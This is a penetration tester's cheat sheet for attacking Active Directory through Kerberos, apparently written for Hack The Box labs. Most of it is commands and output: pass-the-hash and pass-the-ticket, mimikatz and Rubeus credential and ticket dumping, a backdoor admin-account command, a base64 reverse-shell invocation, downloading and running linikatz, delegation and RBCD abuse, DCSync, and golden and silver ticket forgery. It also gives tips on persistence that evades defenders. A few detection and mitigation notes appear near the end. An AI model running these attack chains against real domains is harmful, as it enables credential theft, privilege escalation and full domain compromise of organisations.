When working with Kerberos on Linux, we need to use the target's DNS server or configure our host machine with the corresponding DNS entries for the domain we are targetting. That is, we need to have an entry in /etc/hosts for the domain/Domain Controller before attacking it.
#PTH Evil-WinRM
Intrusionz3r0X@htb[/htb]$ evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
#PTH Impacket
Intrusionz3r0X@htb[/htb]$ impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
#PTH with netexec (--local-auth is helpful if we obtain a local administrator hash and we want to check how many (if any) other hosts we can access due to local admin password re-use. )
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
#Enable Restricted Admin Mode to Allow PtH (DisableRestrictedAdmin)
reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Intrusionz3r0X@htb[/htb]$ xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B
#PTH through mimikatz
c:\\tools> .\\mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /rc4:30B3783CE2ABF1AF70F77D0660CF3453 /domain:inlanefreight.htb /run:cmd.exe" exit
#Execute commands Pth
PS c:\\tools\\Invoke-TheHash> Import-Module .\\Invoke-TheHash.psd1
PS c:\\tools\\Invoke-TheHash> Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose
#Get Reverse shell Pth
PS c:\\tools\\Invoke-TheHash> Import-Module .\\Invoke-TheHash.psd1
PS c:\\tools\\Invoke-TheHash> Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command ""
#More examples
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e Base64revshell"
Invoke-SMBEnum -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b
Invoke-SMBClient -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Source \\\\DC01\\julio\\
Invoke-SMBClient -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Action Get -Source \\\\DC01\\julio\\julio.txt
Pass the ticket
Sacrificial Process in Kerberos Attacks
Prevents Disruption of Critical Services:
Kerberos tickets are tied to the logon session of processes or services.
Overwriting a service's Kerberos ticket can cause authentication failures, leading to service interruptions or requiring a system reboot.
Isolates the Attack Environment:
A sacrificial process creates a new logon session with its own Kerberos context.
This ensures the attack does not interfere with existing logon sessions or processes.
Avoids Reboots or Authentication Loss:
Without a sacrificial process, manipulating Kerberos tickets could force the reboot of the system or service to restore authentication capabilities.
Minimizes Operational Impact:
While creating a sacrificial process generates Indicators of Compromise (IOCs), it is less disruptive than causing service outages, which could also alert the target's security team.
Supports Professional and Ethical Engagements:
Maintaining system stability during penetration testing or red team operations demonstrates professionalism and reduces risk to the environment being tested.
Facilitates Safe Kerberos Ticket Manipulation:
Tools like Rubeus use the createnetonly command to generate a sacrificial process.
Future commands can safely interact with this process via its logon session ID (e.g., /LUID:0xdeadbeef).
Windows
#Sacrificial Processes
PS C:\Tools> .\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
#Read tickets on host
PS C:\Tools> .\Rubeus.exe triage
#Reviewing Ticket Associated with our Session
PS C:\Tools> klist
#Extract ticket from rubeus
PS C:\Tools> .\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap
PS C:\Tools> .\mimikatz.exe privilege::debug "sekurlsa::tickets /export" exit
PS C:\Tools> .\Rubeus.exe dump /nowrap
#ask to Rubeus for a new valid TGT using the one we just extracted(Good Practice)
C:\Tools> Rubeus.exe renew /ticket:doIFVjCCBVKgAwIBBaEDA<SNIP> /ptt
#Read Domain Controller's File System
C:\Tools> dir \\dc01\\c$
#Importing Ticket into Windows Session with Rubeus
C:\\htb> C:\\tools\\Rubeus.exe ptt /ticket:c:\\tools\\julio.kirbi
#Importing Ticket into Windows Session with Mimikatz
C:\\tools> .\\mimikatz.exe privilege::debug "kerberos::ptt c:\\tools\\julio.kirbi" exit
Linux
If you compromise a Linux server as root user try to get /etc/krb5.keytab to be able to extract NT computer account.
#Identifying Linux and Active Directory Integration.
Intrusionz3r0X@htb[/htb]$ realm list
Intrusionz3r0X@htb[/htb]$ ps -ef | grep -i "winbind\\|sssd"
#Finding Keytab Files (To use a keytab file, we must have read and write (rw) privileges on the file.)
Intrusionz3r0X@htb[/htb]$ find / -name *keytab* -ls 2>/dev/null
# It's possible to find keytabs in automated scripts running as crontask
Intrusionz3r0X@htb[/htb]$ crontab -l
#Reviewing Environment Variables for ccache Files.
Intrusionz3r0X@htb[/htb]$ env | grep -i krb5
Intrusionz3r0X@htb[/htb]$ ls -la /tmp
#Listing keytab File Information
Intrusionz3r0X@htb[/htb]$ klist
Intrusionz3r0X@htb[/htb]$ klist -k -t #reads information from a keytab file
#import ticket into our session with kinit.
Intrusionz3r0X@htb[/htb]$ kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
#Extracting Keytab Hashes with KeyTabExtract
Intrusionz3r0X@htb[/htb]$ python3 keytabextract.py /opt/specialfiles/carlos.keytab
#Importing the ccache File into our Current Session
Intrusionz3r0X@htb[/htb]$ klist
#klist: No credentials cache found (filename: /tmp/krb5cc_0)
Intrusionz3r0X@htb[/htb]$ cp /tmp/krb5cc_647401106_I8I133 .
Intrusionz3r0X@htb[/htb]$ export KRB5CCNAME=/root/krb5cc_647401106_I8I133
Intrusionz3r0X@htb[/htb]$ klist
#Linixkatz Download and Execution
Intrusionz3r0X@htb[/htb]$ wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh
Intrusionz3r0X@htb[/htb]$ /opt/linikatz.sh
Pass the ticket via HTTP
To authenticate as a user for HTTP interactions with a domain controller, you must first export the ticket and then utilize the /ptt option to import it into the current session. Subsequently, you can employ the -UseDefaultCredentials parameter to utilize the credentials linked to the PowerShell terminal, which in this instance corresponds to the ticket of the current user.
Mimikatz requires administrative rights to perform the Pass the Key/OverPass the Hash attacks, while Rubeus doesn't.
#Mimikatz - Extract Kerberos Keys
PS C:\\tools> .\\mimikatz.exe privilege::debug "sekurlsa::ekeys" exit
#Forge a ticket using mimikatz.
PS C:\\tools> .\\mimikatz.exe privilege::debug "sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f" exit
# Forge a ticket using Rubeus. You can use (rc4, aes128,aes256, or des)
PS C:\\tools> .\\Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap
#Submit the ticket (TGT or TGS) to the current logon session. (Import)
PS C:\\tools> .\\Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt
PS c:\\tools> .\\Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-intrusionz3r0@krbtgt-inlanefreight.htb.kirbi
PS C:\\tools> .\\mimikatz.exe privilege::debug "kerberos::ptt c:\\tools\\[0;56343]-2-0-40e10000-julio@krbtgt-INLANEFREIGHT.HTB.kirbi" exit
#Convert .kirbi to Base64 Format and Pass the Ticket - Base64 Format
PS c:\\tools> [Convert]::ToBase64String([IO.File]::ReadAllBytes("c:\\tools\\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"))
PS c:\\tools> Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgE<SNIP>
# Once the tickets has been imported. (Lateral Movement)
PS C:\\tools> Enter-PSSession -ComputerName DC01
Convert ccache file (linux) to kirbi file (windows) and vice versa
# Windows -> UNIX
Intrusionz3r0X@htb[/htb]$ impacket-ticketConverter $ticket.kirbi $ticket.ccache
# UNIX -> Windows
Intrusionz3r0X@htb[/htb]$ impacket-ticketConverter $ticket.ccache $ticket.kirbi
AS-REPRoasting
ASREPRoast is a security attack that exploits users who lack the Kerberos pre-authentication required attribute. Essentially, this vulnerability allows attackers to request authentication for a user from the Domain Controller (DC) without needing the user's password.
Requirements:
Lack of Kerberos pre-authentication: Target users must not have this security feature enabled.
Connection to the Domain Controller (DC): Attackers need access to the DC to send requests and receive encrypted messages.
if we find that we have GenericAll privileges on an account, instead of resetting the account password, we can enable the DONT_REQ_PREAUTH flag to make a request to get the hash of this account and try to crack it
Red Teams may enable the DONT_REQ_PREAUTH flag on specific accounts to bypass pre-authentication requirements.
This allows attackers to regain access to accounts even after a password change.
It is particularly useful for establishing persistence on less-monitored devices, such as printers, which are often outside active monitoring scopes.
Accounts with this flag are commonly found on service accounts for legacy management applications, which the Blue Team might overlook.
Privilege Escalation:
In some cases, attackers can modify account attributes without needing to know or reset the password.
Resetting passwords is risky because it has a high likelihood of triggering alerts.
Instead of resetting the password, attackers enable the DONT_REQ_PREAUTH flag and attempt to crack the account's password hash to gain access.
Kerberoasting
Kerberoasting focuses on the acquisition of TGS tickets, specifically those related to services operating under user accounts in Active Directory (AD), excluding computer accounts. The encryption of these tickets utilizes keys that originate from user passwords, allowing for the possibility of offline credential cracking.
Find for SPN services are executed by user accounts. (A user account has a password set by a human, which is much more likely to be predictable.)
COMPUTERNAME$ have 120 characters long randomly generated passwords. (Impossible to crack it)
Windows
Script to find SPN services are executed by users.
/pwdsetafter and /pwdsetbefore whose password was set within a particular date helpful to find legacy accounts with a password set many years ago that is outside of the current password policy and relatively easy to crack.
/stats useful for gathering information and checking the types of encryption the account tickets use.
/tgtdeleg force rubeus to return RC4 tickets.
AES-128 (type 17) and AES-256 (type 18) can be significantly more difficult to crack than RC4 (type 23) tickets.
If we are able to compromise a server that has unconstrained delegation enabled, and a Domain Administrator subsequently logs in, we will be able to extract their TGT and use it to move laterally and compromise other machines, including Domain Controllers.
#Monitor the computer to find high privilege user.
PS C:\Tools> .\Rubeus.exe monitor /interval:5 /nowrap
#Group enumeration
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainGroup -MemberIdentity sarah.lafferty
#Identify the available shares
PS C:\Tools> net view \\COMPUTERNAME
#Create a createnetonly shell
PS C:\Tools> .\Rubeus.exe createnetonly /program:cmd.exe /show
#Request a TGS
PS C:\Tools> .\Rubeus.exe asktgs /ticket:doIFmTCCBZWgAwIBBaE<SNIP>LkxPQ0FM /service:cifs/dc01.INLANEFREIGHT.local /ptt
PS C:\Tools> .\Rubeus.exe renew /ticket:doIFmTCCBZWgAwIBBaE<SNIP>LkxPQ0FM /ptt
If you user possesses SeMachineAccountPrivilege and SeEnableDelegationPrivilege you can add a fake computer and abuse unconstrained delegation.
If an attacker compromised a host configured with unconstrained delegation and has the spool service running.
The attacker might coerce a target domain to authenticate back to the compromised host and retrieve the TGT for domain controller for subsecuenlty perform a DCSync attack.
#Enumerate Unconstrained Delegation
PS C:\> Get-ADComputer -Identity "DC01" -Properties msDS-AllowedToDelegateTo, UserAccountControl | Select-Object Name, UserAccountControl, msDS-AllowedToDelegateTo
#Monitor for TGS
PS C:\Tools> .\Rubeus.exe monitor /interval:5 /nowrap
# trigger the Printer Bug by running the SpoolSample tool
PS C:\Tools> .\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local
#Get a new TGT in memory
PS C:\Tools> .\Rubeus.exe renew /ticket:doIFZjCCBWKgAwI<SNIP> /ptt
#Perform DCSync attack
C:\Tools> mimikatz.exe privilege::debug "lsadump::dcsync /user:Administrator" exit
#Ask to for Administrator's TGT
PS C:\Tools> .\Rubeus.exe asktgt /rc4:a83b750679b1789e29e966d06c7e41f7 /user:Administrator /ptt
#Access to the domain controller
PS C:\Tools> dir \\dc01.inlanefreight.local\c$
If the target computer is not a domain controller, An attacker can use S4U2self to obtain a Service Ticket on behalf of any user we want to impersonate.
User with GenericWrite over the compromise account
Create a DNS record pointing to our attack machine, representing a fake computer in the Active Directory environment.
Add the SPN CIFS/our_dns_record to the compromised account, which has unconstrained delegation.
When a victim tries to connect via SMB to our fake machine, it will send a copy of its TGT in the TGS ticket as it requests a ticket for CIFS/our_dns_record.
The TGS ticket will be sent to the IP address registered in the DNS record, which is our attack machine.
Extract the TGT from the received TGS ticket and use it to perform a DCSync Attack
#Create Fake DNS Record
Intrusionz3r0@htb[/htb]$ git clone -q https://github.com/dirkjanm/krbrelayx; cd krbrelayx
Intrusionz3r0@htb[/htb]$ python dnstool.py -u INLANEFREIGHT.LOCAL\\<user> -p <password> -r roguecomputer.INLANEFREIGHT.LOCAL -d <attacket-ip> --action add <dc-ip>
#Add the SPN to the target account
Intrusionz3r0@htb[/htb]$ python addspn.py -u inlanefreight.local\\<user-genericwrite> -p <password> --target-type samname -t <username-unconstraineddelegation> -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local
#Use the Compromised User to decrypt the recieved TGS.
Intrusionz3r0@htb[/htb]$ python3 krbrelayx.py --krbsalt 'callum.dixon' --krbpass 'C@lluMDIXON' --target dc01.inlanefreight.local
#PrinterBug (Tools)
Intrusionz3r0@htb[/htb]$ python3 printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.213.113 roguecomputer.inlanefreight.local
Intrusionz3r0@htb[/htb]$ python dementor.py -u pixis -p p4ssw0rd -d inlanefreight.local roguecomputer.inlanefreight.local dc01.inlanefreight.local
#Import Ticket
export KRB5CCNAME='DC01$@INLANEFREIGHT.LOCAL_krbtgt@INLANEFREIGHT.LOCAL.ccache'
#Perform DCSync Attack
impacket-secretsdump -k -no-pass dc01.inlanefreight.local
#Authenticate as Administrator
impacket-psexec Administrator@10.129.213.113 -hashes aad3b435b51404eeaad3b435b51404ee:a83b750679b1789e29e966d06c7e41f7
Constrained Delegation
In constrained delegation, delegation is only allowed for a specific list of SPNs. If an attacker has compromised a service account with constrained delegation, they can relay received authentication attempts to one or more SPNs in the list.
Restricts the service to impersonate a user only for specific services.
Instead of sending the TGT, a special TGS ticket is issued for allowed services.
Impersonate Any User
If this constrained delegation allows protocol transition, we can pretend to be anyone, arbitrarily, to authenticate against these services.
We can use the S4U2Self extension if protocol transition is enabled. It allows a service to obtain a forwardable service ticket to itself on behalf of any user.
Since we can retrieve a TGS ticket as any user, we can perform the previous attack without waiting for anyone's authentication.
The account DMZ01$ has TRUSTED_TO_AUTH_FOR_DELEGATION with protocol transition set, and the only allowed service for delegation is www/WS01.inlanefreight.local.
Use bloodhound to enumerate the domain controller and search for WriteAccountRestriction.
The easiest way to get a SPN either Computer or Fake Computer. If you compromise one as root/NT Authority System get the NT hash.
To carry out attacks against RBCD, we require two elements:
Access to a user or group that has privileges to modify the msDS-AllowedToActOnBehalfOfOtherIdentity property on a computer. This is commonly possible if the user has GenericWrite, GenericAll, WriteProperty, or WriteDACL privileges on a computer object.
Control of another object that has an SPN. (The simplest way to obtain an object with SPN is to use a computer [Fake Computer])
From Windows
Script to find RBCD permission
# import the PowerView module
Import-Module C:\Tools\PowerView.ps1
# get all computers in the domain
$computers = Get-DomainComputer
# get all users in the domain
$users = Get-DomainUser
# define the required access rights
$accessRights = "GenericWrite","GenericAll","WriteProperty","WriteDacl"
# loop through each computer in the domain
foreach ($computer in $computers) {
# get the security descriptor for the computer
$acl = Get-ObjectAcl -SamAccountName $computer.SamAccountName -ResolveGUIDs
# loop through each user in the domain
foreach ($user in $users) {
# check if the user has the required access rights on the computer object
$hasAccess = $acl | ?{$_.SecurityIdentifier -eq $user.ObjectSID} | %{($_.ActiveDirectoryRights -match ($accessRights -join '|'))}
if ($hasAccess) {
Write-Output "$($user.SamAccountName) has the required access rights on $($computer.Name)"
}
}
}
PS C:\Tools> .\SearchRBCD.ps1
carole.holmes has the required access rights on DC01
Steps to carry out the attack:
Create a computer.
Obtain the computer SID.
Set msDS-AllowedToActOnBehalfOfOtherIdentity in raw binary format.
Modify the target computer.
PS C:\Tools> Import-Module .\Powermad.ps1
PS C:\Tools> New-MachineAccount -MachineAccount HACKTHEBOX -Password $(ConvertTo-SecureString "Hackthebox123+!" -AsPlainText -Force)
[+] Machine account HACKTHEBOX added
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $ComputerSid = Get-DomainComputer HACKTHEBOX -Properties objectsid | Select -Expand objectsid
PS C:\Tools> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\Tools> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\Tools> $SD.GetBinaryForm($SDBytes, 0)
PS C:\Tools> $credentials = New-Object System.Management.Automation.PSCredential "INLANEFREIGHT\carole.holmes", (ConvertTo-SecureString "Y3t4n0th3rP4ssw0rd" -AsPlainText -Force)
PS C:\Tools> Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose
# Ask for a TGT for the created computer account
PS C:\Tools> .\Rubeus.exe hash /password:Hackthebox123+! /user:HACKTHEBOX$ /domain:inlanefreight.local
# Ask for a TGS ticket for the specific Service
PS C:\Tools> .\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:<NT-HASH-COMPUTER> /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt
PS C:\Tools> klist
PS C:\Tools> ls \\dc01.inlanefreight.local\c$
Note: We can also use /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm to include additional services to our ticket request.
Use bloodhound to enumerate the domain controller and search RBCD privilege to abuse.
#Enumerate ms-DS-MachineAccountQuota (set to 10 by default for authenticated users
Intrusionz3r0@htb[/htb]$ nxc ldap 10.129.205.35 -u 'carole.holmes' -p 'Y3t4n0th3rP4ssw0rd' -M maq
# add the account to the targeted computer's trust list (carole.holmes has GenericAll)
Intrusionz3r0@htb[/htb]$ impacket-addcomputer inlanefreight.local/carole.holmes:'Y3t4n0th3rP4ssw0rd' -computer-name 'FAKECOMPUTER2' -computer-pass 'Password123!'
#Modify the attribute msDS-AllowedToActOnBehalfOfOtherIdentity on Target
Intrusionz3r0@htb[/htb]$ impacket-rbcd inlanefreight.local/carole.holmes:'Y3t4n0th3rP4ssw0rd' -delegate-from 'FAKECOMPUTER2$' -delegate-to 'DC01$' -dc-ip 10.129.205.35 -action write
#Read the msDS-AllowedToActOnBehalfOfOtherIdentity on Target
Intrusionz3r0@htb[/htb]$ impacket-rbcd inlanefreight.local/carole.holmes:'Y3t4n0th3rP4ssw0rd' -delegate-to 'DC01$' -dc-ip 10.129.205.35 -action 'read'
#Request the Service Ticket
Intrusionz3r0@htb[/htb]$ impacket-getST -spn cifs/DC01.inlanefreight.local -impersonate Administrator -dc-ip 10.129.248.217 inlanefreight.local/HACKTHEBOX2:'Hackthebox123!'
RBCD from Linux When MachineAccountQuota Is Set to 0
If we are unable to create a computer account, or if the account we are targeting doesn't have an SPN, an attacker can still perform the attack.
#Obtain a TGT Using the NT Hash
Intrusionz3r0@htb[/htb]$ pypykatz crypto nt 'B3thR!ch@rd$'
de3d16603d7ded97bb47cd6641b1a392
#Request a TGT
Intrusionz3r0@htb[/htb]$ impacket-getTGT INLANEFREIGHT.LOCAL/beth.richards -hashes :de3d16603d7ded97bb47cd6641b1a392 -dc-ip 10.129.205.35
#Obtain the Session Key
Intrusionz3r0@htb[/htb]$ impacket-describeTicket beth.richards.ccache | grep "Session Key"
[*] Ticket Session Key : abbf1e575095d070cd6de0beab5cad4d
# Change the User's Password by passssing the current TGT's session key as the new NT hash.
Intrusionz3r0@htb[/htb]$ impacket-changepasswd INLANEFREIGHT.LOCAL/beth.richards@10.129.205.35 -hashes :de3d16603d7ded97bb47cd6641b1a392 -newhash :abbf1e575095d070cd6de0beab5cad4d
#Request a Service Ticket
KRB5CCNAME=beth.richards.ccache impacket-getST -u2u -impersonate Administrator -spn TERMSRV/DC01.INLANEFREIGHT.LOCAL -no-pass INLANEFREIGHT.LOCAL/beth.richards -dc-ip 10.129.205.35
#Access the Domain Controller
KRB5CCNAME=Administrator@TERMSRV_DC01.INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL.ccache impacket-wmiexec DC01.INLANEFREIGHT.LOCAL -k -no-pass
RBCD Example 1:
Requirements
ADM_PRJU possesses the permission to modify msDS-AllowedToActOnBehalfOfOtherIdentity
Control an object that had a SPN. (We previously compromised a Linux machine FRAJMP$)
❯ impacket-rbcd heron.vl/adm_prju:'ayDMWV929N9wAiB4' -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -dc-ip 10.10.215.101 -action write
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FRAJMP$ can now impersonate users on mucdc$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
❯ impacket-getST heron.vl/FRAJMP$ -hashes :6f55b3b443ef192c804b2ae98e8254f7 -spn cifs/MUCDC.heron.vl -impersonate 'MUCDC$' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating MUCDC$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in MUCDC$@cifs_MUCDC.heron.vl@HERON.VL.ccache
❯ KRB5CCNAME='MUCDC$@cifs_MUCDC.heron.vl@HERON.VL.ccache' impacket-secretsdump -k -no-pass @MUCDC.heron.vl
<SNIF>
Kerberos Relay Attack
Requirenments:
LDAP signing not required on Domain Controller.
Ability to add computer account
Check to more information about the attack: Redelegate
Finally, use impacket-getST or Rubeus to ask for Ticket Granting ticket using S4u and perform the DCSyncAttack.
Using KrbRelayUp
#1. Check available Port
PS C:\Temp> ./CheckPort.exe
#2. Performing attack
PS C:\Temp> .\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
Finally, use impacket-getST or Rubeus to ask for Ticket Granting ticket using S4u and perform the DCSyncAttack.
Golden Ticket
The Golden Ticket attack lets attackers forge and sign TGTs (Ticket Granting Tickets) using the krbtgt account's password hash. When these tickets are presented to an AD server, the information within them is not checked and is considered valid because it is signed with the krbtgt account's password hash.
Forging a golden ticket is an excellent technique to maintain persistence within an AD environment. Once full domain compromise is achieved, an attacker can extract the NTLM hash of the krbtgt account using DCSync (or from the NTDS.DIT file using a variety of methods).
After a TGT (Ticket Granting Ticket) request, the domain controller sends the user their TGT. This TGT contains a PAC (Privilege Attribute Certificate), which includes information about the user's privileges. Each Service Ticket issued by the KDC contains a copy of the PAC, and the domain controller uses the krbtgt account key to sign these tickets.
An attacker can exploit the krbtgt key to decrypt any TGT, including its PAC, modify it to make it appear as though the user belongs to the administrators group, and then re-encrypt it using the krbtgt secret.
Golden Tickets are challenging to detect because they are valid TGTs, and Windows event logs cannot distinguish between legitimate and maliciously crafted TGTs. Resetting the password of an impersonated account does not invalidate an existing Golden Ticket.
Key detection points include:
Golden Tickets often have unusually long lifespans (e.g., Mimikatz defaults to 10 years). Certain Active Directory monitoring tools can flag these as Indicators of Compromise (IoCs).
Anomalies in the account DOMAIN field, such as being blank or containing the fully qualified domain name (FQDN) instead of just the domain name.
To mitigate Golden Ticket persistence, the krbtgt account password must be changed twice to eliminate both the current and previous keys stored in the domain. It's also advisable to regularly rotate the krbtgt account password as part of standard security practices.
Silver Ticket
The Silver Ticket attack targets service tickets in Active Directory (AD) environments. This attack involves obtaining the NTLM hash of a service account, such as a computer account, and using it to forge a Ticket Granting Service (TGS) ticket. With the forged ticket, an attacker can impersonate any user to access specific services on the network, often aiming for administrative privileges.
The TGS ticket contains a PAC (Privilege Attribute Certificate), which includes details about the user's privileges and the SPN (Service Principal Name) of the requested service. This ticket is encrypted using the secret key of the service account associated with the SPN.
The attacker can forge a service ticket from scratch since they can create an arbitrary PAC and encrypt it with the secret stolen. Once this TGS ticket is forged, the attacker presents it to the service. The service can decrypt it because it has been encrypted with its own password, and then it will read the contents of the PAC. As the attacker has forged it, they can embed whatever information they desire, such as being a domain administrator. This forged ticket is called a Silver Ticket.
Requirements:
NTLM password's hash or keys for a service or machine account
Domain Name
Domain SID
Username to Impersonate
Silver tickets allow you to impersonate any user, including domain admins, but only within the context of the service tied to the compromised account’s SPN. The forged ticket is valid exclusively for that service, not for others like LDAP or CIFS, unless they share the same service account.
Silver Tickets are more limited when compared to Golden Tickets because their scope is only for the service that is being targeted on a specific host. However, they can be utilized to remain stealthier. Silver Tickets can be used for persistence when used to access computer-hosted services. Since computer account password rotation may be disabled, and AD does not prevent computer accounts from accessing resources, this type of Silver Ticket could likely be used for a very long time.
Silver Tickets forged with Mimikatz can be detected in a few ways.
The account DOMAIN field is blank.
The account DOMAIN field contains DOMAIN FQDN instead of just domain.
S4U CheatsheetS4U Basics
S4U (Service for User): Allows a trusted account to impersonate users via Kerberos.
Tools: Rubeus (Windows), Impacket (Linux).
Requires: Delegation permissions (RBCD, Unconstrained, or Constrained).
S4U2Self
What: Gets a ticket for yourself impersonating another user (e.g., Administrator -> KRBRELAYUP$).
